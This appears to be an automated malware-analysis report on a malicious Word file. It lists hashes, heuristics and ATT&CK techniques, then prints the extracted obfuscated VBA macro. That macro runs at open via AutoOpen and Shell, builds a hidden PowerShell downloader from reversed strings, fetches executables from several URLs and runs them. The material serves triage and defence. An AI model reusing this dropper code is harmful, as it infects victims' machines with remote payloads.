Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc63e9fbb30a6437…

MALICIOUS

Office (OLE)

100.5 KB Created: 2018-02-06 17:25:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 0622b618aaf35b1968766949fdf383e9 SHA-1: dd847aba47152b8b6123812511dd7d0b07c1d0e7 SHA-256: fc63e9fbb30a6437e0c90e4bc13d566f9bf1bf0fddec66686cbb1a87f3495c79
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.004 Client Execution: System Binary Proxy Execution

The file contains a VBA macro with an AutoOpen function that utilizes the Shell() function, a critical indicator of malicious activity. This macro references mshta.exe, a legitimate Windows utility often abused by malware to execute remote scripts or download payloads. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a dropper or phishing lure functionality.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    KVSzzmwZL = cjjdnZlHOMPUN - SKbDwUWbWhz / (1407019 + BaGpiprRk - 7741937 + DbSPqHZpIqi)
Shell sojPBMKB, 0
mKudqTBJw = jLjjHXlfVLh - zAUCGkOIIz / (4436637 + nwuAwXPapw - 4377316 + iijkoKmfz)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "RlRvMEQmcw"
Sub AutoOpen()
On Error Resume Next
  • Reference to mshta.exe high SC_STR_MSHTA
    Reference to mshta.exe
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23840 bytes
SHA-256: 825f9347f5426391cd351dae2f211a37539fc3ad35cdd5424ba32d1af7fb9ac2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
840 of 1193 identifiers look randomly generated (e.g. 'dwAwnstSJzOrDOIPvZtsAtnVFinTIFvnDHcj'); 17 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "RlRvMEQmcw"
Sub AutoOpen()
On Error Resume Next
nmCYLZOtz = mjFLPBzFBpZz - kwIjjUTQpYWNpS / (597538 + zfmqkinsMqT - 393913 + LXhnrRaCqfZj)
WwHiwZjwi = KmJKBKP - sARiiApawA / (5486516 + HzNKOmfJOR - 7011779 + HHNudjQ)
PnTmZOsSG = XajTGwKZzvPfFH - PLWWnuwSkMk / (7657312 + ovWTYQqqB - 7345002 + KCVikAk)
Application.Run "BdRKTUaHLPzAvA", saIqIUYVJZSqhM
hLLJCVvTz = IwGWIzkDYwG - RlOZVMkZShjcD / (5358191 + ftBXFRP - 6466307 + fiBFlaM)
Edruavczi = ZIbPiShvFKXY - YBDLurL / (6129414 + sVfzLhbkQBoWr - 1357666 + nBLUJfPo)
End Sub
Function saIqIUYVJZSqhM()
On Error Resume Next
vTmnrBnl = HmlwmFlJTI - BIjHkUci / (1267229 + LTdrEwsUPvvDB - 2433031 + ocNTzaJ)
jIdwst = lwSwnXcQdDhvTI - iItoDNP / (9478498 + UDvsPPJQ - 389707 + rslwEzniSA)
FAXiHrR = QkfWfKElGj - BLikbjBOuR / (8809627 + RMwKorPizznDSQ - 4138291 + EFivnVraUUVE)
jkfnRj = EwzbfvHwtMK + Mid(StrReverse("jGZEczZPbMTTPTzVzfhMJbCYvVje+f4e5esp+espVQ ,P5Vesqnaflfvoil"), 11, 22)
JjcNTIOLv = AYEXaSLORJonz - vVVqUWLE / (8789247 + ljiBLBEpkFmwm - 610248 + CJpMtRPZiSoMJ)
CVfTziMZV = XiwfNmunJCPFzC - WzjSzRMVszZWH / (184921 + XouuMaqRZQwP - 40522 + woRMjHSFuMdL)
YUpfdu = DfnQnmaf - LFpRjiKBwCM / (6711049 + LHJatQRthQBSml - 7213311 + LdZHVcM)
jajJjEfEzP = DGCXnOKiAPu + Mid(StrReverse("LdwTjtvLKwINp+esp+P5V)(EY1P5'+'V+P5Vg'+'NPbP5V+P5V0iPb0rtSoTE'+'Y1.cfsP5V+P'+'5Va3RqAiD"), 6, 70)
ZqvovniwWHB = fGNsJNhdoo - twYBnZmbajvnKT / (6245394 + BTpBsfSFtz - 7091340 + tnwYhQjnW)
iEwFSOUkEHn = aBNwjkkTCYdqf - zmHOiSHp / (7844913 + imkWFumtAK - 8696009 + otwhVauMmCIoY)
YPublz = JSIDjkMqQtANNI - kqVQLwNPwzhv / (5517884 + fivwKkTkzaIb - 9588113 + EhHMlZCMmXN)
sEPLl = PakusOazZH + Mid(StrReverse("DXKSoBB+'sp5VsP5V+P5Vadases'+'p+espn3eQP5V( ( )P5VP5V'+'nesp+es'+'pioj-]52,f4e+f4e6'+'2,4e'+'s'+'p+esp[cepsmoC:Vne'+'jtk ( & esp(( (Xeif4e(( '((( )''nioj-]2,11,3[EmaN.)'*rDm*' ElBAIRAV((.dpjkwbFvwkwmEKzRSAV"), 20, 180)
FFsjtmTHdV = zsuIjAjKP - VJCjSsXkNpQYr / (4829168 + rqtpcsIOH - 595719 + rPdwLswQjj)
sCawa = aRWhipiBaBVo - JqUnzMvvdzBIG / (3343622 + XcbsnKQbTvN - 3744875 + FcSVammVXJS)
JUkXzVmXwGs = klwSVYXYEd - adBjtPBrjsPpBh / (6131094 + UiIzTIYCZTIw - 4336407 + vacirsZFtFWRi)
naTzMr = vDLFBpjHkPEPDX + Mid(StrReverse("DjGDwAqELYvmuG )93]rAhc[,)101]rAhc[+511]rAhc[+211]rAhc[(EcAlPeR-)f4e'+' ) )69]RAhc[,)88]RAhc[+111]RAhc[+001]RAhc[(  ecalPER-93]RAhc[,espP5Ves'+'pecalPER-63]RAhc[,)601]RAhc[+611]RAhc[+701]RAhc'+'[(ecalPEtaNdJrjqzRvofR"), 15, 188)
ZqnKdT = EwHZGDVuz - NWpnHPlCdCZzh / (5547677 + XIfmBiwAZn - 5135006 + TwTwodjiYvBjoI)
lNYBSN = AbrHRiAjupHvKP - PAhRRDKFlT / (67300 + AbGvztkzZhfISS - 2961522 + GjiVTCjBCW)
TSYdqwZo = ppVGoRkAInuKB - RwiUYwzomzF / (7050549 + azvFtbDuHDb - 8259182 + hRHkMWjvCGzjd)
fbpqIrTOrWY = VwvlprDtwdd + Mid(StrReverse("rwtvP5V+P5Ve'+'jf4e'+'+f4eeP5V+P5VOP5V+P5V+jeOxP5V+Pesp+esp5Ve.jP5V+P5mppJzC"), 7, 66)
FsvBE = AjwfJtGdjRhh - niDjYqz / (4754438 + DMtDhamEX - 2683757 + CLniPsNrDwGJTB)
LTicpw = SADmNPJkjlmF - jqcuTnzb / (9068856 + TfdFVTwDZC - 9588519 + mAkAisbH)
iKARjsVF = cmBKMUMpjCHXik - jKoRjhND / (2723489 + DbJSJHAnXq - 8641693 + vJwjNszpjHP)
rAJRzUBaA = qBDWBEmKDN + Mid(StrReverse("zwqfVwvHOdTGbNqZiR- )esp ))29]RAhC[]f4e+f4egNIRW"), 2, 30)
zCSrWwpQfWP = DXXuHjHuNIOiT - UUDYpvL / (6115529 + pCqQIaJ - 7790675 + AGjqVFiz)
bIjEoHX = VPIFZqX - vfPuMjXVhsRTwT / (778735 + EiMTiwwpqu - 8088066 + tjdzsNfiZ)
fzVYjDXokB = oZJVnNRjC - LoBvdDQ / (9433347 + ZERqHbzORalo - 4938631 + oqnKIKlYKsnEEi)
ofHHdSCkB = QTEJXPPjnkI + Mid(StrReverse("QfFKjRbzesp+esp jP5V+P5VeP5V+P5VO = XP5V+P5VCDA3eQ;)331'+'282 ,0P5V+P'+'5V0P5V+P5V001P5Vf4'+'eXRNzKXGPciqwzDwUwZ"), 19, 86)
LaDhzOsA = zFROmuMFqtImvA - YCDXPhuloGcudT / (899064 + PUnYEbZR - 1941657 + cjwovBzQzf)
CAjlhTwJMOz = WaQFTcHJAillkt - IbpzdlMtE / (2762261 + AKauNWYKsuWTk - 9786366 + IJmrvMvdt)
ZTjTlB = aACNJhMqic - jGVPMZAXlHEwLd / (638053 + NTdEjjV - 7530209 + WziMKcGWUY)
zYNKXE = WpwizAKWiBtp + Mid(StrReverse("MzzkKnwmOrnLbXVHTTZPjUcVeOP5V+P5V(P5V+P5esp+espV f4e+f4e+ BP5V+P5VSf4e+f4eP'+'5V+P5VN3eQ + Pesp+esp5V+P5VjP5'+'V+'+'Pf4e+f4e5VeOeRP5V+P5Tzin"), 5, 113)
jCJwYzN = VBqjGazXB - QDkitqcSKb / (5945849 + cqEAolkqJaYFRU - 6003637 + clKFEwEVS)
QjZRpPYoZkX = irJcvjlWZAfG - NmKOpifQZLPq / (4823009 + ZudmjhFDt - 6430258 + frTuufiVzzSt)
OwsCjWEmdzk = PqmSIjumVPMc - NvYjKtdjJnMVfj / (6368117 + ZTGAtXsvmv - 2372847 + uJbHRwRmzSnZQ)
NYwIht = RbimuGI + Mid(StrReverse("YUsp+espVcP5V+Pf4e'+'+f4e5V};P5V+P5VkaerP5V+P5Vf4e+f4'+'ebPesp+esp5e'+'sp+esp'+'V+P5DskcCzjDHbiuD"), 14, 82)
GQQPcH = wwFcCqCdu - hpmzLFDjO / (8944560 + GjhjpRpUpS - 2251804 + cNfBpwbjTYY)
lcIWIzV = aRFsUtwmSuqQY - MYNIFwVPJmfDO / (7058804 + KDiHpIYLzAvVZ - 1495968 + WPdvjCWKSbWL)
TfSnstjVml = TMQiLzHr - IikoMQIJ / (5163491 + HbPPaSBkotPfSz - 3242442 + kjQKazqOHuLvp)
TizIwtaMCd = FDazdAN + Mid(StrReverse("LFmJniADutkuHUAtJiCMfwmNLvwV;P5'+'V+'+'P5V)CDf4e+'+'f4eS3P5V+Pf4e+f4e5VeQ()jP5V+P5Vesp+espf4e+f4eeOmeP5V+P5VtI-P5V+P5VejeP5V+Pep"), 2, 100)
MsjBHSAq = qMKOTzscQnXUjZ - QVHlBIfHFvirG / (5933517 + tlomsEzMjsVii - 4507811 + VZcQkFvuCo)
KWFqpOFw = EETlGmzY - mftjoQJbsfdBjh / (4991758 + Oqumwqmw - 6514641 + vsvljjGdmpjvcT)
Bvpufwu = UCXKJVWtcswDlv - tvzoVQjGvwuGvk / (5481770 + ObrdoPnYi - 4752232 + StndVhqwkwnwfn)
vddXXrKl = CJAaDfD + Mid(StrReverse("sofRPRGwFYqesp3P5V+P5VeQ = CDP5Vf4e+f4e+P5VSP5V+P5V3eQ;)jeesf4e'+'+f4ep+espO?jeO(tilP5V+P5V'+'pS.jeO/esp+espWzP5riav"), 5, 101)
uBlEFCa = aJwRNNIT - YForWacLqt / (7532314 + JPzqSUFBaP - 6796828 + cVdBNaiTv)
ilmPSDAWS = pVUICHzibNqjR - zavsCRwIVVPAwb / (9641193 + KTiUabVKR - 9492740 + soVbsEj)
kiiKuSH = mfpQdqh - zsCLXkM / (592593 + FwTXFlaFOG - 3932177 + uXvMZLk)
PkEkmK = bOOObIAZicuRHi + Mid(StrReverse("RwzaIIV+P5VoP5Vesp+esp+P5VirP5V+P5Vet'+'nieP5V'+'+P5Vlbidesp+esperc//f4e+f4e:ptth ArQzfiwOTnTAvd"), 15, 76)
hTpCfqIzLcj = cSEnIPfh - PLOkMzFUGwwYbi / (4054387 + SbvjTKT - 6903511 + siqknzuiqFrluf)
ihdQGP = QzJojjAkiip - jzaEsimURPkSB / (792416 + kciTYvTSWAfDOr - 9585742 + BwIKjPBw)
iPGqTn = HLKBMrmc - PIEORtQfEDMbY / (5574310 + IjUstOUafM - 3206725 + IRKJsaZbpCmj)
ZFJEwp = CAisbWRPmi + Mid(StrReverse("YMmFDbrwsMAjiUHlwjWsf4e+f4ep+esp5Vesp+espO+jP5V+P5VeOkjeP5V+f4e+f4eP5VOP5V+P5Vf4'+'e+f4e+jP5V+P5'+'VeP5V+P5VOovP5V+P5VnIjeO(&;)CDS3ePesp+esp5Vf4e+f4e+Pf4wVRYUijTa"), 10, 134)
JznFz = cXujauhZCAJHN - uUAwBdGwniwNJd / (8633711 + hBRXhlwrwjIc - 7019868 + EnnQDRikhNn)
lkYrjkuA = kPkNkDhUTIp - NIWJAUVdMGZLZ / (8789282 + bDwUEkABiH - 7228612 + EvPNwzwCvvVkMs)
kSWQfwL = UdqYnriF - WokGMGoBO / (4816071 + iwtcNcqdj - 6592091 + HMajXriw)
nHXts = uBLzmfjiq + Mid(StrReverse("YYXWGVYZFvFcJvCfsP5V+P5VeQ(EYP5V+P5Vesp+esp1elPb0IFdP5V+P5VaOPb0lnWf4e+f4'+'ePb0P5V+P5VoDEYesp+ePPZnizKRsiHuVLr"), 16, 79)
AFjXQQzMlW = pGTWnbbYkNLKA - ZiKjYff / (6707291 + TQUqtzDUAlAoZO - 8099517 + kzIndWnEZQ)
YwdCF = fboLKGKzF - lhahsLYzM / (41118 + ULnfXvSwcQ - 3283740 + hXsLaphOPkC)
lPiSRf = RiGlLOEMPvLQAf - KrDcCUFsJAzwK / (5931426 + EkJpNpphkNME - 2507152 + LcLuCXWLHzdM)
fRIhMIIYGMt = apwqINq + Mid(StrReverse("slVGXsWjzjnpaRIsWDLTfn+P5VpP5V+P5Vtt'+'P5V+P5VhP5V+P5V?P5V+P5V/EYUP'+'5V+P5VN/m'+'oc.gnP5V+P5Viretac-ssP5V+P5ViP5V+P5VbP5V+P5Vmi/P'+'5V+P5esp+espV/:P5V+'+'P5Vptth?P5'+'V+P5V/EWlTP5V+P5'+'VNP5V+P5V/P5V+P5VmoP5V+P5V'+iQo"), 4, 193)
aYnzZ = KSOpPsGwXo - HHOtcJL / (252591 + twYzSXivkVzcDC - 2374445 + sKOUjwNYMmZPz)
YZKtjhqLfzV = zAQwbNuRXsJKNC - bEFCAkzzjQvjz / (7166483 + zSwlXwLEaww - 5206956 + VLZkKjkhUNzOw)
mCjikqnDi = jijiujq - qLbfqPzfDBJLbV / (8275070 + ZQAwdFBX - 4759602 + bVuUDuwbUNIitU)
TEVFLYEO = wkMQthiqbHLRw + Mid(StrReverse("fsnOYKjYPSqvlFmzEpYksahtDVMWiTBV"), 7, 1)
laTGDnXoR = RlKEGuodljwOP - AdCuWfQ / (7855094 + FRmTNiYPZPDKjC - 749152 + wjEDZzrWbN)
QzblOzbsHEo = TKHzccpEn - bazMUZwLqR / (5237410 + WYzLlVIZPrzPFE - 3374285 + bhuzQDWFF)
SjDHjKcYi = FYtKlwmUojAQq - wNFkbjHPHi / (7016587 + XdhSBtGu - 3150489 + jEFCdkQiPKra)
SUStIHR = oJvFmcOrVFif + Mid(StrReverse("nVStACA08]RahC[+18]RahC[+45]RahC[( EcAlpER-  421]RahC[,)78]RahC[+96]RahC[+56]RahC[( ecaLpErc- 93]RahC[,'f4e'  EcAlpER-)')f4eXf4e+]43['+'EmohSPPQ6+]4[emoHSpPQ6 ('+' & WEAWIhCvV"), 7, 162)
SSLvF = KadZJmWiG - wDLhBfZG / (4279453 + ZSZRwbfTOPkKaT - 4303313 + ccTztAJzuXp)
BhsXb = zHEONprrAL - hHCTqZlcsKX / (616758 + mYGZJaWZmKWHLW - 9454044 + cfdQAmqrjTaJ)
hhioKCG = zKZDIcpjShapDv - fLfDoqPfunwAhO / (8493774 + zNiozzDCtHCKz - 542146 + wrtMVnWUEii)
qMAEJ = CwmdVjp + Mid(StrReverse("vizirpLSAJY8/mof4e+f4eP5V'+'+P5Vc.evesp+espitcarP5V+P5VeP5V'+'+P5VtniaiP5f4e+f4eV'+'+P5VdP5V+P5VeP5V+P5Vmcra.revresdf4e+f4ea//:P5VQnMjwunZwBzidJBoMmQN"), 21, 123)
zOzQJsS = iHcJjoFirMzJoC - CdsaGVRmqR / (44427 + jGczXjwdNLNo - 2971497 + wnEMSTSDozi)
UKhILBFljA = AcQUmrjHVcPMbZ - YIrQELdYiidzj / (2940991 + RfQZiTNtYVH - 1604911 + UYrltbtu)
MTuqDoWjf = hdmXDmmJszrpKj - BqYLPSuzCXEFqr / (1123975 + VlUwmmL - 3154232 + HPdIQRJovjC)
NvoCZXd = QMbHUarabYH + Mid(StrReverse("BVSJbGWXkT'+'sf4e+f4e[,)1'+'01]RAhC[+28esp+esp]RAhC[+55]RAesp+esphC[((ecALPE'+'r.)P5VjtkP5V,P5Vf4e+f4e3eQP5Vf4e+f4e(ecALPEr.)93]R'+'AhC[]f4e+f4egNIf4eMIrdZjKAzWzmcwDdZIWaj"), 22, 141)
CvMToAfc = jvRmuVDqlJOiHk - DRomFvQv / (1602420 + CoFqLFC - 2259103 + tLwqOuNTC)
PTpwwClDn = UYvwXbVszuDQ - IjrhzAa / (724184 + SqqwEaar - 8534862 + OJniGriOqNF)
tMERF = OdKpHWMPT - iJFFGaWuRGB / (5224240 + rVEkqPl - 6992068 + GBbNlPTEicImb)
LmqEiCodzn = hfimjkz + Mid(StrReverse("zBZrCsiN+'+'jeP5V+P5VOwP5V+P5Vjeesp+espO+jP5V+P5VeP5V+Pef4eCWMw"), 5, 51)
ZEGjwAsHv = TClWzhrsCD - spHaMbYSPQr / (6044485 + FIsotHlolSvR - 3782722 + caujbVYs)
KwhzHk = lUjXqVMDc - BQrpCwvSpH / (4423510 + JsSwrVhP - 1898699 + NqHUJjuT)
SIJSzalHsp = OSuRsllrkj - jkvZLqF / (9018645 + qWNMrCBhioL - 4611661 + jItObZKFiw)
KmEmY = ZBlHsvwzPnc + Mid(StrReverse("RoZfIWrJKrriURZlk UY'+'Y3eQ;P5V+P5VmodP5V+P5Vnar )jP5V'+'+P5VeOP5esp+espV+Pesp+esp5VtjeO+jeOcP5V+W"), 2, 80)
iUPlc = hapjEIv - fMBnjwPfkY / (2451916 + dGPZGzZViY - 6283703 + PnhAkbB)
hkHPiUM = AObObIBNDw - RVTbbLPdE / (6713390 + mGjzXsPPvIW - 8294484 + PiAzwwMSkI)
AhCPfjKjs = jwMFoUzzm - cUickIznCGu / (5769595 + MzLRiFWHCzQTbj - 1871729 + aKZEwnJRVOp)
ULazjFrw = GbdvhJSdzphs + Mid(StrReverse("YjFXwwF))63]RahC[,)ihnKfbMTD"), 10, 12)
jbSBGmN = TrQTZXR - IboNcvUZ / (9254882 + ntwQQHcVvv - 3430233 + hBzXrioiNm)
rkqiCjZapho = NFNaSEGBcFaUjG - aIrEbWq / (6819602 + mPEEllRLBuiLCh - 1936786 + pupTGhNQp)
RiAfzInQ = fnJLcXVS - CzCPqoOSpYqYb / (6398469 + lcAPoFCoOiGiC - 8121249 + LpjtHQnfw)
VrPjTXi = fhCVCBzId + Mid(StrReverse("jZklDohdIBskpP5V+P5VjeP'+'5V+P5VOP5V+P5V(&P5V+P'+'5V = dP5V+Pesp+e'jvWBSSrV"), 9, 54)
KBiqqCzW = FiizLnkkKM - XNAohZXwzCk / (9230647 + dvQuBXjRRokEL - 1523988 + zuNUflA)
LWKofspYcFz = zuWjwaCTVir - QWqjmfLGYQ / (6872983 + RSwDpPQEdQ - 3724779 + iriqOUO)
XMLmGh = TlodDiiAat - jKAPjbzi / (1164592 + mszDpEvzV - 8506010 + CNDfdVz)
kWKDGwPGjj = sOYswjEGVZA + Mid(StrReverse("bXskYwqCZcesp+esp.kf4e+f4eqnP5f4e+'+'f4eV+P5ValP5V+P5f4e+f4eVpP5V+esp+espP'+'5esp+espV.f4'+'e'+'+f4eP5V+P5Vgnigf4e+f4eatsP5V+P5V-sda//:'+'ptth?P5V+P'+'5V/C1ACNaWDXjKIY"), 12, 146)
hGYaNhlus = BOPpIDjtpaO - nCEBDdzwjC / (1198379 + TZCHJqQAZTvGcN - 8825886 + XmovlltN)
OktYiJT = hGJshszIPWj - YjwJNAU / (1350199 + YpknZzOKOifohb - 6982293 + IrawzNrK)
SSCZfzMnAi = wCplXkZG - JQZEIvkzBnD / (2493363 + IOCFItKALzZia - 8922729 + ZqwGhGRTiD)
IwjnCWfTE = jQijJnpi + Mid(StrReverse("VEtLGizSjwJdJPjsWo DISZkOrcrRCmRttj"), 17, 1)
AvfXUKfcaNw = jwawTzahALY - pzfjquUB / (4902430 + wAztSiSAz - 8081542 + WZlfTzidBi)
WuoljRovBXo = bAPJQYD - ORCTzawajrPA / (2822221 + nSXtEWulYXiw - 4876910 + dJStzQbGUGnFVZ)
vZspk = lmilsMw - WUjlcsikzAzw / (4565836 + WDwHhwRGwB - 4109832 + nlDMjmhXvYQi)
ohrVkzUn = fMALEGvIubjS + Mid(StrReverse("NDPjaVcQjfV+P5Vxesp+espeP5V+P5Vn.dsadP5V+P5Vasn3esp+espeQP5V+P5V P5V+P5V= BSN3eQ;P5'+'V+P5VtP5V+P5VneilCbeW.teN.metsyP5V+P5VS P5V+Pesp+f4e+f4eesp5V'+')jeOtcP5V+P5VejP5V+P5Vbo-P5V+Pesp+esp5VjeOP5V+P5VFqrVIiPwTnUJuDkLiwaR"), 21, 189)
bzCosNi = UQWiQsFtjnUNPA - wmUITJvStjs / (1241663 + VcZvHjDfBlN - 1261389 + woAkINdi)
XBpXGPmNDr = oTdLoYzcw - liXDOYFjww / (9302054 + GBKMGSJ - 4539494 + csEoGSvuihZ)
FCLNCwd = pUiYlmMChhjVm - bAcSfTbt / (1776613 + TOIGJlRRWOQh - 6238098 + VfzUzvIjCtrvR)
GhSPMUalPqm = NpVnEVcdMPanlf + Mid(StrReverse("qwphIbLrTYhlMrMlT7jeO +P5V+P5V ciP5V+P5V'+'lP'+'5V+P'+'5Vbup:esp+espP5V+P5Vvf4e+f4eneesp+vDUHJVndUNmqCEFlnC"), 19, 72)
BicLFjDW = FsvPSwYvuUo - zWGvOckMOPOUEP / (3276459 + UVnhzCr - 5381297 + fqkdzwb)
nIKCUhwIA = PBjFAzQVJOq - bKDhWbYjGzz / (5990141 + timzjRSnqoO - 6446061 + TYWMpnAzaUnDGV)
XOnVa = uWSDEbHOiW - zYqkVozaIA / (2020356 + HKijSNzvdvttUW - 2028296 + ULJrqQqcGqw)
AsPjwQoWs = BFLwLtFW + Mid(StrReverse("Jh'c.P5V+P5VaidP5V+f4e+f4eP5Vem'+'P5V+P5VkP5V+P5VcP5V+P5Vajj.P5esp+espV+P5Vwww//:ptP5V+P5Vth?P5V+P5V/APc'+'xn/P5V+P5Vni'+'.srP5QqLVVVKFf"), 10, 125)
dkzuSdEsIDr = BizQziWFzrSErU - ZbOBrzi / (4177156 + sLRDZWIM - 3032612 + ozIazThaQj)
wzZGXBdG = XTYYUNmij - SIoXnNTfbjGoXf / (765459 + BPhJWSosU - 8479149 + fEIVijUWpUCLG)
lHzQzUKKR = upzKjvtUD - WzZczTwC / (9153601 + obSNYHDJOw - 9748143 + avcdrhl)
BDEswMP = EfNYjbKtZupBfa + Mid(StrReverse("GfihkXjqzBt+f4esp+esp5VOenP5V+P5VjeO(.es'+'p+espP5V+P5V P5V+P5V=zlhTAYLYDwzfvIjtCjs"), 20, 53)
NbbCY = TWkmbsjFHNT - izWcORzVda / (4200716 + nALntYwno - 4008292 + HGvJDPFt)
jmZkmQoVF = fOcsAsJiQQzt - VzbhwLi / (2816881 + iJqOVTIvFXjm - 6813975 + XTnBPQWXXP)
AGUGEn = lviWTuL - wjTBlWqaVL / (4995242 + OmaDOJKTw - 2005292 + laIkXaZl)
jUdQfMw = zLAwwlHsWVYAQm + Mid(StrReverse("RiIPDGwYrGtSDDiBCaKhvzP5esp+espVejP5V+P5Vbo-wP5V+P5VjeO+jeOeP5V+P5VjeP5V+Pesp+esp5VOf4e+f4e+jesp+espeP5esp+espV+P5VOnbNKzs"), 6, 95)
FNmiLMp = zCszViHK - sWoVhadmSzva / (9396686 + wBiwwHjuIJwoY - 3119150 + CvRatbvwWXqY)
KqjYXjQ = GpFlAJvzmfKDD - NiXtCMBPEdzDQB / (932328 + bFjonSEM - 7599296 + UnQPGXqdh)
SREIDwl = wioLqqlbm - tusZEFUOKuaKFo / (8496519 + zoWbMnTnO - 9495256 + XwzhcaqUa)
BuccpiEsH = URkrERBiZpA + Mid(StrReverse("ipZOtesp+espV+P5f4e+f4eVHPf4e+f4e5'+'V+P5VKfP5esp+es'+'pV+P5V/'+'P5V+P5VmP5Vf4e+f4e+P'+'5Vf4e+f4eocP5V'+'+P'+'5VanjwjwkAjTkDkTFBNqEzXPoUwpwhJFw"), 32, 107)
Tfjia = EKkFbFLHnwQNNw - PTRTIdUXkUfv / (4900007 + RDWGkXPFPw - 7768106 + EOHLFZsEJjB)
oEUrKafOiF = iTjmzlvK - iVstHcaUKESf / (5467132 + GQYPGCUPlC - 2655526 + RncFiDiuWt)
JPhdpqi = SwwSkwbid - tdVaVpH / (3292498 + jqjjLmrEa - 2956981 + iDNCGQJ)
YhqBCizX = rLBDcSnroYzTcq + Mid(StrReverse("EuGmiUibloPEr.)43]RAhC[]gNIRTs['+',P5VEY1P5V(ecALPEresp+esp.)P5VXodP5V,)'+'08'+']RAhC['+'+8'+'9]RAhC[+84]RAesp+esphC[(esp+f4e+f4eesf4e+f4ep(ecALPEr.)P5V}}P5V+P5V{P5V+P5VhctaP5Vf4e+f4eesp+esp+P5eGiJtzlvhZnbj"), 13, 184)
tOzWvzkr = dDJYmPlftu - TbXqQTU / (954698 + WhBZWvRnckZ - 3516713 + dFzDiUB)
zYsYsN = FqWIAIthun - DiAvBkCq / (9590275 + DJUiSwSqMpzDIR - 8304398 + QVmXFiwPPSc)
hbOsGqtaYK = wScdDZBj - ZiKbqhw / (2038460 + ZjEVUjEasVMFTz - 4154000 + stNWzjPK)
tvdZLMmwIqi = jQKTkRXKGiIO + Mid(StrReverse("WfDAaqziJAJoYsf4e+f4epP5V+P5V1.UYY3P5V+P5VeP5V+P5VQ{yrf4e+f4et{f4e+f4e)XCDA3eP5'+'Vesp+esp+P5VQ nP5V+P5ViP5V+P5V cfPesp+f4e+f4eesp5Vesp+esp+P5Vsa3eP5V+P5Vesp+espQ(P5V+P5VhcaP'+'5V+P5Verof;)jeODXwmsHpZqmEjrAMY"), 17, 179)
iYRLnDd = cwvYdjj - vGjoRwnloA / (8006040 + uritcidUOA - 896292 + cEPvRzV)
XfKWIbGV = iqikDmi - NMQODYKkU / (312832 + wDMFvBdMNisTqi - 7434726 + DJtqpANHBkqB)
YUKcnpmACrI = tfaPBXz - kniZaQhUtZ / (6894831 + nGbaLGwqE - 845194 + LbITDRDp)
HcwatYcp = qmbwOAwEPtt + Mid(StrReverse("iLAlKk+f4e+P5V(tP5wKTiYkqrJipwIPLsMShTaFcjVGCDzbbm"), 33, 12)
uADpQzEw = mIKGkQnDAEu - JRjcXzSzdD / (7931290 + ciXnFPurPKSw - 48599 + rrjARzu)
aQiXC = dwntoTzlCjSa - GszzkKDJwzj / (5419641 + GaRclqpsA - 4933359 + MbbudIi)
YmoMEiuiwu = ZbkwjDjoqaf - DRVMWUZzcklGTz / (7052547 + jJfqQGCr - 4186865 + kZFBwSUazvF)
RCGznAPVAsO = nPTVLQPj + Mid(StrReverse("qUscHIGiVZhNRAloXhW+f4eResp+espTs[,)6esp+esp01]RAhC[+101]RAhC[+97]RAhC[((e'+'cALLpr"), 4, 61)
saIqIUYVJZSqhM = CWZbpKCws + XIilAopif + KFGvEhfBOi + ChrW(34) + SWFhupiwOiqv + sEPLl + VrPjTXi + jUdQfMw + KmEmY + BDEswMP + LmqEiCodzn + ohrVkzUn + HcwatYcp + ofHHdSCkB + PkEkmK + AsPjwQoWs + fRIhMIIYGMt + qMAEJ + kWKDGwPGjj + BuccpiEsH + vddXXrKl + GhSPMUalPqm + TEVFLYEO + zYNKXE + fbpqIrTOrWY + tvdZLMmwIqi + nHXts + jajJjEfEzP + jkfnRj + ZFJEwp + TizIwtaMCd + NYwIht + YhqBCizX + RCGznAPVAsO + NvoCZXd + rAJRzUBaA + naTzMr + SUStIHR + ULazjFrw + IwjnCWfTE
jzsbmSlsC = EUmWHfGNBrvDH - wRYfsAjaXbYj / (8663277 + CXsnfdSkuX - 6439467 + qAdzAjs)
JiUuFABIi = LzYmhLdwIYdQLX - wpKfwYb / (8556727 + juidnmdVoniZJ - 3247987 + pAArIOsT)
ztHLqchYk = hCndALV - IcYoapYBqwXjkb / (8287501 + ljfbnsGOwUb - 2771710 + MApVOGQuIT)
End Function

Attribute VB_Name = "pmBiRbdOOGAuVj"
Function KFGvEhfBOi()
On Error Resume Next
YivrWusUj = aGTwuBuL - CzjptUpiMhZKd / (4404806 + ZJkwEZOCWB - 5978623 + cGniGDqTvFrlNr)
qDWRZJ = cwdwzjvZlQzGOn - MoOVMYZDSHnDcT / (3353251 + jNcmFtChQjhBOJ - 9405420 + fAsDXsiYDsK)
